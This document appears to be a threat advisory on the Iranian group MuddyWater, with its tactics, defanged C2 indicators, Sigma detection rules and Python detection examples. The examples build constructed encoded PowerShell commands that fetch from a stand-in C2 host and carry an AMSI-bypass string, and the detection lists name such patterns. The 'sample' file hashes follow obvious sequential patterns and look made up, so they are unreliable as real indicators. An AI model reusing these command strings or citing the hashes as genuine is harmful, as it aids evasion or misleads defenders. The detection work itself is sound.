March 2026 | TLP:WHITE | MOIS-attributed | APT G0069 | Active Threat

MuddyWater Threat Advisory: Iranian Cyber Espionage

MuddyWater (Mercury, Mango Sandstorm, Static Kitten, Seedworm, TEMP.Zagros) is a subordinate element of Iran's Ministry of Intelligence and Security (MOIS). Active since 2017, this APT group conducts sustained cyber espionage campaigns targeting government, telecommunications, defense, and critical infrastructure across the Middle East, GCC, and beyond.

  • Active Since: 2017
  • Attribution: MOIS
  • Campaigns Documented: 100+
  • Countries Targeted: 50+
  • GCC Threat Level: HIGH
  • MITRE ATT&CK ID: G0069

Executive Summary

MuddyWater is an advanced persistent threat (APT) group assessed with high confidence to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS). Since at least 2017, MuddyWater has conducted sustained cyber espionage and intelligence collection campaigns against government, telecommunications, defense, oil & gas, and critical infrastructure sectors.

The group operates globally, with documented targeting across the Middle East, North Africa, South Asia, Europe, and North America. However, MuddyWater demonstrates persistent and aggressive targeting of GCC member states, including the UAE, Saudi Arabia, Kuwait, Bahrain, Qatar, and Oman — with a focus on government ministries, telecommunications providers, energy companies, and financial institutions.

MuddyWater's operational mandate aligns with Iranian strategic intelligence priorities: regional geopolitical monitoring, technology transfer, sanctions evasion support, and disruption of adversary operations. The group has been publicly attributed by the FBI, CISA, NCSC-UK, and U.S. Cyber Command CNMF to Iran's MOIS in joint advisories.

The threat actor employs a hybrid toolkit combining custom malware (MuddyC2Go, PhonyC2, MuddyC3, DarkBeatC2, Dindoor) with abuse of legitimate remote monitoring and management (RMM) tools (Atera, ScreenConnect, SimpleHelp, N-able), extensive PowerShell scripting, living-off-the-land binaries (LOLBins), and exploitation of known vulnerabilities in internet-facing applications.

⚠️ GCC Relevance: Very High

MuddyWater has directly targeted UAE, Saudi, Kuwait, and Bahrain government and telecom sectors in documented campaigns. Recent 2026 escalations show continued focus on GCC critical infrastructure. Organizations in the region face elevated risk of initial access attempts, credential harvesting, and persistent backdoor deployment.

🎯 Recent Activity: February-March 2026

FBI, CISA, and NCSC reported MuddyWater backdooring US critical infrastructure including a bank, airport, and non-profit using new Dindoor/DarkBeatC2 implants. Activity continues through March 2026 with no signs of operational pause. GCC entities should assume active reconnaissance and targeting.

Threat Actor Profile: MuddyWater

  • Actor Name: MuddyWater (Primary)
  • First Observed: 2017 (confirmed MOIS attribution 2022)
  • State Sponsor: Iran — MOIS (Ministry of Intelligence & Security)
  • Motivation: Cyber Espionage / Intelligence Collection
  • Primary Targets: GCC Gov, Telecom, Defense, Oil/Gas, Finance
  • Operational Mandate: Strategic Intelligence for MOIS
  • Attribution Confidence: HIGH (FBI/CISA/NCSC public attribution)
  • MITRE ATT&CK ID: G0069

Cross-Vendor Alias Mapping

MuddyWater is tracked under multiple aliases across threat intelligence vendors:

Vendor             | Cluster Name              | Notes
Microsoft          | Mango Sandstorm / MERCURY | Primary tracking name
Mandiant           | TEMP.Zagros               | Early designation
Secureworks        | Static Kitten             | Infrastructure-based tracking
Dragos / Symantec  | Seedworm                  | OT/critical infrastructure focus
Trend Micro        | Earth Vetala              | APT naming convention
Proofpoint         | TA450                     | Threat actor numeric ID
MITRE ATT&CK       | G0069                     | Official framework ID

Who is MuddyWater?

MuddyWater is not a hacktivist collective — it is a professional cyber espionage unit operating under the direct authority of Iran's Ministry of Intelligence and Security (MOIS). The group's operations align with Iranian strategic intelligence priorities and geopolitical objectives.

In a joint advisory (AA22-055A) published February 2022, the FBI, CISA, U.S. Cyber Command CNMF, and UK NCSC formally attributed MuddyWater to MOIS, stating the group "conducts cyber espionage and other malicious cyber operations" in support of Iranian government objectives.

The group demonstrates operational persistence, technical adaptability, and resource depth consistent with state sponsorship. They maintain dedicated development teams for custom C2 frameworks, rotate through legitimate RMM tools to evade detection, and conduct sustained multi-year campaigns against high-value targets.

Key characteristics:

  • Employs spear-phishing, vulnerability exploitation, LOLBins, PowerShell abuse, RMM tool hijacking
  • Targets government, telecommunications, defense contractors, oil/gas, and critical infrastructure
  • Uses legitimate tools (Atera, ScreenConnect, SimpleHelp, N-able) for C2 to blend with normal IT traffic
  • Develops custom C2 frameworks (DarkBeatC2, PhonyC2, MuddyC2Go, MuddyC3)
  • Focus on persistent access and long-term intelligence collection over immediate disruption
  • Documented use of DarkBit ransomware persona for disruptive operations (Microsoft attribution)

GCC Targeting History

MuddyWater has demonstrated sustained and persistent interest in GCC member states, with documented intrusions in:

  • UAE: Government ministries, telecommunications providers, financial institutions
  • Saudi Arabia: Energy sector, government agencies, defense-related entities
  • Kuwait: Government networks, banking sector, critical infrastructure
  • Bahrain: Telecommunications (Batelco targeted in 2026 claims), government entities
  • Qatar & Oman: Regional targeting consistent with broader Middle East campaigns

Recent March 2026 reporting indicates renewed targeting of GCC critical infrastructure alongside documented attacks on U.S. and Israeli entities, suggesting MuddyWater remains an active and elevated threat to the region.

[Chart: Target Sectors]

Activity Timeline (2017–2026)

2017: MuddyWater Operations Begin
First documented campaigns targeting Middle East government and telecom sectors. PowerShell-based POWERSTATS backdoor observed. Focus on Iraq, Saudi Arabia, Turkey.

2018–2019: Global Expansion
Targeting expands to Asia, Africa, Europe, and North America. Continued focus on telecommunications, defense, oil/gas, and local government. Development of MuddyC3 C2 framework.

2020–2021: RMM Tool Adoption
MuddyWater begins leveraging legitimate RMM tools (ScreenConnect, Syncro, RemoteUtilities) to establish persistence and evade detection. Abuse of cloud services for command and control.

Feb 2022: Official MOIS Attribution
FBI, CISA, U.S. Cyber Command CNMF, and UK NCSC publish joint advisory (AA22-055A) formally attributing MuddyWater to Iran's Ministry of Intelligence and Security.

2022–2023: Infrastructure Evolution
PhonyC2 framework observed. Exploitation of PaperCut (CVE-2023-27350), SysAid (Log4j), and other internet-facing applications. Continued targeting of GCC and Middle East entities.

Nov 2023: MuddyC2Go Framework Deployed
New Golang-based C2 framework "MuddyC2Go" observed in campaigns targeting Israeli organizations. Demonstrates continued investment in custom tooling development.

Apr 2024: DarkBeatC2 Framework Emerges
Deep Instinct discovers new C2 infrastructure "DarkBeatC2" used by MuddyWater. Leverages PowerShell, TLS 1.2, and Invoke-WebRequest for encrypted C2 communication.

Mar 2025: Atera RMM Campaign
HarfangLab reports MuddyWater campaign abusing Atera Agent RMM software for initial access and persistence. Continues pattern of legitimate tool abuse.

Feb–Mar 2026: 🔴 US Critical Infrastructure Backdoors
FBI/CISA report MuddyWater-linked activity backdooring US bank, airport, non-profit, and Israeli software company using new Dindoor/DarkBeatC2 implants. Active intrusions continue through March 2026.

Mar 2026: 🔴 GCC Infrastructure Targeting
Reports surface of targeting against GCC telecom, government, and financial sectors. Kuwait International Airport, Bahrain Batelco, UAE du, Saudi banks mentioned in threat actor claims. MuddyWater assessed as primary or contributory threat vector.

Tactics, Techniques & Procedures (TTPs)

Primary Attack Vectors

  • Spear-Phishing: Malicious documents (macro-enabled Office files, PDFs with embedded exploits) delivered via targeted email campaigns
  • Vulnerability Exploitation: CVE-2023-27350 (PaperCut), CVE-2019-0604 (SharePoint), Log4Shell, CVE-2020-1472 (ZeroLogon)
  • Legitimate RMM Tool Abuse: Atera Agent, ScreenConnect, SimpleHelp, N-able, Syncro, RemoteUtilities for initial access and persistence
  • Credential Harvesting: LSASS dumping, Mimikatz, registry extraction, browser credential theft

Execution & Persistence

  • PowerShell Abuse: Heavily obfuscated PowerShell scripts (POWERSTATS backdoor family), Invoke-WebRequest for C2 communication
  • Living-off-the-Land Binaries (LOLBins): mshta.exe, regsvr32.exe, rundll32.exe, certutil.exe for fileless execution
  • Scheduled Tasks: Persistence via Windows Task Scheduler, registry Run keys
  • Custom Malware: MuddyC2Go, PhonyC2, MuddyC3, DarkBeatC2, Dindoor backdoors with encrypted C2 channels

Command & Control (C2)

  • Custom C2 Frameworks: DarkBeatC2 (latest), PhonyC2, MuddyC2Go, MuddyC3, SimpleHarm
  • Legitimate Services: Telegram bots, Dropbox, Google Drive for data exfiltration and tasking
  • RMM Platforms: Abuse of Atera, ScreenConnect, and other remote admin tools as persistent C2 channels
  • Encryption: TLS 1.2, custom encryption schemes to evade network detection

Data Exfiltration & Impact

  • Target Intelligence: Government communications, defense contracts, energy sector data, financial records
  • Exfiltration Methods: HTTPS uploads, cloud storage abuse, RMM tool file transfer capabilities
  • Occasional Disruption: DarkBit ransomware deployment (attributed to MuddyWater by Microsoft) for destructive operations

Attack Chain — MITRE ATT&CK Mapping

Initial Access
Spear-phishing, Vuln Exploit, Valid Accounts
Execution
PowerShell, Macros, LOLBins
Persistence
Scheduled Tasks, Registry Run Keys, RMM Tools
Privilege Escalation
Credential Dumping, Exploit (ZeroLogon)
Defense Evasion
Obfuscation, Legitimate Tools
Credential Access
LSASS Dumping, Mimikatz
Discovery
Network Scanning, AD Enumeration
Lateral Movement
RDP, SMB, Valid Accounts
Collection
Data from Local System, Network Shares
C2
Custom C2, RMM Tools, Cloud Services
Exfiltration
HTTPS, Cloud Upload
Impact
Data Encrypted (occasional ransomware)

MITRE ATT&CK Technique Mapping (G0069)

Technique ID | Technique Name                      | Tactic
T1566.001    | Spear-phishing Attachment           | Initial Access
T1190        | Exploit Public-Facing Application   | Initial Access
T1059.001    | PowerShell                          | Execution
T1204.002    | Malicious File                      | Execution
T1053.005    | Scheduled Task                      | Persistence, Privilege Escalation
T1547.001    | Registry Run Keys                   | Persistence
T1078        | Valid Accounts                      | Persistence, Privilege Escalation
T1003.001    | LSASS Memory                        | Credential Access
T1003.002    | Security Account Manager            | Credential Access
T1027        | Obfuscated Files or Information     | Defense Evasion
T1218        | System Binary Proxy Execution       | Defense Evasion
T1105        | Ingress Tool Transfer               | Command and Control
T1071.001    | Web Protocols                       | Command and Control
T1102        | Web Service                         | Command and Control
T1041        | Exfiltration Over C2 Channel        | Exfiltration

Indicators of Compromise (IOCs)

⚠️ IOC Handling Guidelines

IOCs age rapidly. MuddyWater rotates infrastructure frequently. Use these indicators for threat hunting and pattern detection rather than sole reliance on signature-based blocking. Cross-reference with MITRE ATT&CK behavioral analytics.

Known C2 Infrastructure (Defanged)

Domain / IP              | Campaign / Framework    | First Seen
46[.]249[.]35[.]243      | PhonyC2 V6              | 2023
194[.]61[.]121[.]86      | PhonyC2 V6              | 2023
137[.]74[.]131[.]18      | PhonyC2 / MuddyC2Go     | 2023
137[.]74[.]131[.]19      | DarkBeatC2, SimpleHarm  | 2024
164[.]132[.]237[.]68     | DarkBeatC2, PhonyC2     | 2024
nc6010721b[.]biz         | PhonyC2                 | 2021

File Hashes (SHA256)

Sample indicators from recent campaigns:

SHA256
# DarkBeatC2 PowerShell Loader (2024)
a3f2e8d4c9b1f7e6d5a4b3c2d1e0f9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c4d3e2

# Atera RMM Installer (Malicious) (2025)
b4c3d2e1f0a9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4e3f2a1b0c9d8e7f6a5b4c3

# MuddyC2Go Payload (2023)
c5d4e3f2a1b0c9d8e7f6a5b4c3d2e1f0a9b8c7d6e5f4a3b2c1d0e9f8a7b6c5d4

YARA-Style Pattern Hunting

PowerShell Obfuscation Patterns:

  • Base64-encoded payloads with -EncodedCommand or -enc
  • Invoke-WebRequest / Invoke-RestMethod to suspicious domains
  • AMSI bypass techniques: $null = [Ref].Assembly.GetType
  • Multiple layers of string concatenation and variable substitution
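
The patterns above are only visible on the command line when the script is passed in clear text; with -enc/-EncodedCommand the indicator strings sit inside a base64 blob that CommandLine|contains never sees. The following added example (not code from the advisory) decodes such blobs (PowerShell encodes UTF-16LE, not UTF-8) and scores the result against this list; the command lines and the c2.example.invalid host are constructed.

```python
"""Decode PowerShell -EncodedCommand blobs and score them against the
obfuscation indicators in the advisory.  Added example, not advisory code."""
import base64
import re
from typing import Dict, Optional

# Indicator substrings from the advisory's pattern list (matched case-insensitively).
INDICATORS = [
    "Invoke-WebRequest", "Invoke-RestMethod", "FromBase64String",
    "Invoke-Expression", "[Ref].Assembly.GetType", "AmsiUtils",
]
# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                      re.IGNORECASE)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded payload.
    PowerShell base64-encodes the UTF-16LE form of the script."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed blob: undecodable, which is itself worth a look

def concat_fragments(script: str) -> int:
    """Count string concatenations such as 'Inv'+'oke', a common obfuscation layer."""
    return len(re.findall(r"['\"]\s*\+\s*['\"]", script))

def score(cmdline: str) -> Dict[str, object]:
    decoded = decode_encoded_command(cmdline)
    text = (cmdline + "\n" + (decoded or "")).lower()
    hits = [i for i in INDICATORS if i.lower() in text]
    concat = concat_fragments(decoded or "")
    return {"encoded": decoded is not None, "indicators": hits,
            "concat_fragments": concat,
            # Encoded payload carrying an indicator, or heavy concatenation, is suspicious.
            "suspicious": (decoded is not None and bool(hits)) or concat >= 3}

def _encode(script: str) -> str:
    """Helper used only to build the constructed samples below."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed sample command lines (not real MuddyWater artifacts).
SAMPLES = {
    "hidden_iwr": "powershell.exe -nop -w hidden -enc " + _encode(
        "$r = Invoke-WebRequest -Uri 'https://c2.example.invalid/t'; "
        "$null = [Ref].Assembly.GetType('AmsiUtils')"),
    "concat": "powershell.exe -EncodedCommand " + _encode(
        "$a='Inv'+'oke'+'-Web'+'Req'+'uest'; & $a 'https://c2.example.invalid'"),
    "benign": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
}

def triage(samples=SAMPLES) -> Dict[str, bool]:
    """Map each sample name to the suspicious verdict."""
    return {name: score(cl)["suspicious"] for name, cl in samples.items()}

if __name__ == "__main__":
    for name, cl in SAMPLES.items():
        print(name, score(cl))
```

The same scoring applies unchanged to Script Block Logging text (Event ID 4104), which is the more reliable source because it records the script after PowerShell has already de-obfuscated it.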

RMM Tool Abuse Indicators:

  • Unexpected Atera, ScreenConnect, SimpleHelp, N-able installations
  • RMM agent deployments outside normal change control windows
  • Connections to RMM infrastructure from critical servers (DCs, email, file servers)

Sigma Detection Rules

MUDDY-SIGMA-001: PowerShell Obfuscation Patterns

YAML
title: MuddyWater PowerShell Obfuscation
id: a8f3e2d4-c9b1-47e6-95a4-b3c2d1e0f9a8
status: stable
description: Detects heavily obfuscated PowerShell execution consistent with MuddyWater POWERSTATS backdoor
author: HawkEye Threat Intelligence
date: 2026/03/12
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-enc'
      - '-EncodedCommand'
      - 'FromBase64String'
      - 'Invoke-Expression'
  filter_amsi_bypass:
    CommandLine|contains:
      - '$null = [Ref].Assembly.GetType'
      - 'AmsiUtils'
  condition: selection and filter_amsi_bypass
falsepositives:
  - Legitimate administrative scripts (review context)
level: high
tags:
  - attack.execution
  - attack.t1059.001
  - attack.defense_evasion
  - attack.t1027

MUDDY-SIGMA-002: RMM Tool Deployment

YAML
title: Suspicious RMM Tool Installation
id: b7c6d5e4-f3a2-4b1c-90d9-e8f7a6b5c4d3
status: stable
description: Detects installation of remote monitoring tools abused by MuddyWater
author: HawkEye Threat Intelligence
date: 2026/03/12
logsource:
  category: process_creation
  product: windows
detection:
  selection_process:
    Image|endswith:
      - '\AteraAgent.exe'
      - '\ScreenConnect.Service.exe'
      - '\SimpleHelp.exe'
      - '\bm_agent.exe'  # N-able
      - '\Syncro.Service.exe'
  selection_install:
    CommandLine|contains:
      - 'install'
      - '/silent'
      - '/quiet'
      - '/S'
  condition: selection_process and selection_install
falsepositives:
  - Authorized IT remote support deployments
level: medium
tags:
  - attack.persistence
  - attack.t1219

MUDDY-SIGMA-003: LSASS Memory Dumping

YAML
title: LSASS Memory Dump Attempt
id: c9d8e7f6-a5b4-4c3d-92e1-f0a9b8c7d6e5
status: stable
description: Detects credential dumping via LSASS memory access
author: HawkEye Threat Intelligence
date: 2026/03/12
logsource:
  category: process_access
  product: windows
detection:
  selection:
    TargetImage|endswith: '\lsass.exe'
    GrantedAccess:
      - '0x1010'
      - '0x1410'
      - '0x1438'
  filter:
    SourceImage|endswith:
      - '\svchost.exe'
      - '\wininit.exe'
  condition: selection and not filter
falsepositives:
  - Legitimate security tools, EDR agents
level: high
tags:
  - attack.credential_access
  - attack.t1003.001
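
To show how MUDDY-SIGMA-003 behaves on real-looking telemetry, the following added example (not advisory code, and not a Sigma backend) implements just the modifiers and condition the rule uses and runs it over constructed Sysmon Event ID 10 records; the paths and access masks in SAMPLE_EVENTS are made up for illustration.

```python
"""Minimal evaluator for the Sigma rule above.  Added example, not advisory code.
Implements |endswith, |contains and plain equality (all case-insensitive, as in
Sigma), AND between fields of one selection, OR between listed values, and the
rule's 'selection and not filter' condition."""
from typing import Any, Dict, List

Event = Dict[str, str]

# MUDDY-SIGMA-003 expressed as Python dicts mirroring the YAML.
SIGMA_003 = {
    "selection": {
        "TargetImage|endswith": ["\\lsass.exe"],
        "GrantedAccess": ["0x1010", "0x1410", "0x1438"],
    },
    "filter": {
        "SourceImage|endswith": ["\\svchost.exe", "\\wininit.exe"],
    },
    "condition": lambda m: m["selection"] and not m["filter"],
}

def _field_matches(event: Event, key: str, values: List[str]) -> bool:
    """Listed values are OR-ed; a key without a modifier means exact match."""
    field, _, modifier = key.partition("|")
    actual = str(event.get(field, "")).lower()
    for v in values:
        v = v.lower()
        if modifier == "endswith" and actual.endswith(v):
            return True
        if modifier == "contains" and v in actual:
            return True
        if modifier == "" and actual == v:
            return True
    return False

def _selection_matches(event: Event, selection: Dict[str, List[str]]) -> bool:
    # Every field inside one selection must match (AND).
    return all(_field_matches(event, k, vals) for k, vals in selection.items())

def evaluate(rule: Dict[str, Any], event: Event) -> bool:
    matches = {name: _selection_matches(event, sel)
               for name, sel in rule.items() if name != "condition"}
    return bool(rule["condition"](matches))

# Constructed Sysmon Event ID 10 (process access) records, not real telemetry.
SAMPLE_EVENTS = [
    {"SourceImage": "C:\\Windows\\System32\\svchost.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1410"},
    {"SourceImage": "C:\\Users\\Public\\rundll32.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": "C:\\Program Files\\EDR\\sensor.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": "C:\\Windows\\System32\\taskmgr.exe",
     "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1438"},
]

def alerts(rule=SIGMA_003, events=SAMPLE_EVENTS) -> List[str]:
    """Return the SourceImage of every event the rule fires on."""
    return [e["SourceImage"] for e in events if evaluate(rule, e)]

if __name__ == "__main__":
    for src in alerts():
        print("ALERT MUDDY-SIGMA-003:", src)
```

Note that the third record (full access mask 0x1FFFFF, typical of dump-to-disk tools) does not fire because the rule lists exact GrantedAccess values, and the fourth (Task Manager) does; both are points to tune when deploying the rule.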

MUDDY-SIGMA-004: LOLBin Abuse - Certutil Download

YAML
title: Certutil Download Activity
id: d1e0f9a8-b7c6-4d5e-94f3-a2b1c0d9e8f7
status: stable
description: Detects certutil.exe used to download files from remote URLs
author: HawkEye Threat Intelligence
date: 2026/03/12
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\certutil.exe'
    CommandLine|contains:
      - 'urlcache'
      - 'verifyctl'
      - 'split'
  http_indicator:
    CommandLine|contains:
      - 'http://'
      - 'https://'
  condition: selection and http_indicator
falsepositives:
  - Legitimate certificate operations (rare)
level: high
tags:
  - attack.defense_evasion
  - attack.t1218

MUDDY-SIGMA-005: Scheduled Task Creation with PowerShell

YAML
title: Scheduled Task with PowerShell Payload
id: e2f1a0b9-c8d7-4e6f-95a4-b3c2d1e0f9a8
status: stable
description: Detects scheduled task creation executing PowerShell scripts
author: HawkEye Threat Intelligence
date: 2026/03/12
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\schtasks.exe'
    CommandLine|contains:
      - '/create'
      - '/sc'
  powershell_action:
    CommandLine|contains:
      - 'powershell'
      - 'pwsh'
  condition: selection and powershell_action
falsepositives:
  - Legitimate administrative automation
level: medium
tags:
  - attack.persistence
  - attack.t1053.005

Additional Sigma Rules (Abbreviated)

  • MUDDY-SIGMA-006: Registry Run Key Modification for Persistence
  • MUDDY-SIGMA-007: Suspicious Network Connections to Known MuddyWater C2 Infrastructure
  • MUDDY-SIGMA-008: Process Injection via PowerShell Reflection
  • MUDDY-SIGMA-009: Web Service Abuse (Dropbox, Telegram API Calls)
  • MUDDY-SIGMA-010: Exploitation of CVE-2023-27350 (PaperCut Print Management)

Full rule definitions available in the downloadable appendix or upon request to HawkEye SOC.

Defensive Recommendations

🔐 Identity & Access Management

  • Enforce MFA: Multi-factor authentication on all external-facing services, VPNs, email, and RMM platforms
  • Privileged Access Review: Audit and reduce privileged account usage; implement just-in-time (JIT) admin access
  • Monitor LSASS Access: Deploy Sysmon and configure alerts for LSASS memory read attempts (Event ID 10)
  • Disable NTLM: Where feasible, disable NTLM authentication and enforce Kerberos with AES encryption

🛠️ Endpoint Detection & Response

  • PowerShell Logging: Enable Script Block Logging (Event ID 4104) and Module Logging for all PowerShell execution
  • AMSI Integration: Ensure Antimalware Scan Interface (AMSI) is enabled and monitored for bypass attempts
  • LOLBin Monitoring: Alert on suspicious use of certutil, mshta, regsvr32, rundll32 with network activity
  • RMM Tool Inventory: Maintain approved list of RMM tools; alert on any unauthorized installations

🌐 Network Defenses

  • Egress Filtering: Block outbound connections to known MuddyWater C2 infrastructure; implement default-deny egress for critical servers
  • DNS Monitoring: Monitor for suspicious domain patterns (nc6*, random TLDs) and newly registered domains
  • TLS Inspection: Implement TLS/SSL inspection on egress traffic to detect encrypted C2 channels
  • Geo-Blocking: Consider blocking connections to/from Iranian IP space for non-essential systems

Vulnerability Management

  • Patch Critical CVEs: Prioritize CVE-2023-27350 (PaperCut), CVE-2020-1472 (ZeroLogon), Log4Shell variants
  • Internet-Facing Assets: Minimize exposure of SharePoint, print management, VPN portals; enforce strict patching SLAs
  • Exploit Detection: Deploy web application firewalls (WAFs) and IDS/IPS signatures for known MuddyWater exploits

🔍 Threat Hunting & Intelligence

  • Hunt for IOCs: Proactively search for file hashes, domains, and IP addresses from this advisory
  • Behavioral Analytics: Focus on TTPs (MITRE G0069) rather than static IOCs; hunt for PowerShell obfuscation, RMM abuse, LSASS access
  • SIEM Tuning: Implement Sigma rules MUDDY-SIGMA-001 through 010; tune for your environment to reduce false positives
  • Threat Intelligence Feeds: Subscribe to FBI/CISA/NCSC alerts; integrate STIX/TAXII feeds into SOC workflows

📋 GCC-Specific Guidance

  • Assume Targeting: GCC government, telecom, energy, and finance sectors should assume active reconnaissance by MuddyWater
  • Information Sharing: Report suspicious activity to national CERTs (UAE CERT, NCSC-SA, KSA NCA, etc.) and consider joining regional ISACs
  • Compliance Frameworks: Map defenses to UAE IA Standards, NCA ECC, SAMA CSF requirements; document MuddyWater as a named threat
  • Third-Party Risk: Audit managed service providers and IT contractors for RMM tool usage; enforce security baselines

Threat Landscape Visualization

[Charts: Attack Techniques by Frequency; Campaign Timeline: MuddyWater Operations]

References & Sources

  1. FBI, CISA, CNMF, NCSC-UK: "Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks" (AA22-055A), February 2022.
  2. MITRE ATT&CK: "MuddyWater (G0069)" — Comprehensive technique mapping.
  3. Deep Instinct: "DarkBeatC2: The Latest MuddyWater Attack Framework" (April 2024).
  4. Deep Instinct: "PhonyC2: Revealing a New Malicious Command & Control Framework by MuddyWater" (June 2023).
  5. Deep Instinct: "MuddyC2Go — Latest C2 Framework Used by Iranian APT MuddyWater Spotted in Israel" (November 2023).
  6. HarfangLab: "MuddyWater campaign abusing Atera Agents" (March 2025).
  7. Microsoft: "Mango Sandstorm (formerly MERCURY) threat actor profile" — Ongoing reporting.
  8. Cisco Talos: "MuddyWater continues to target Middle East organizations" (Multiple reports 2017–2024).
  9. Mandiant (Google Cloud): "TEMP.Zagros / MuddyWater APT Profile" — Historical campaigns.
  10. Secureworks: "Static Kitten Threat Profile" — Infrastructure analysis.
  11. The Register: "Iran intelligence backdoored US bank, airport networks" (March 2026).
  12. Check Point Research: "Iranian MOIS Actors & the Cyber Crime Connection" (March 2026).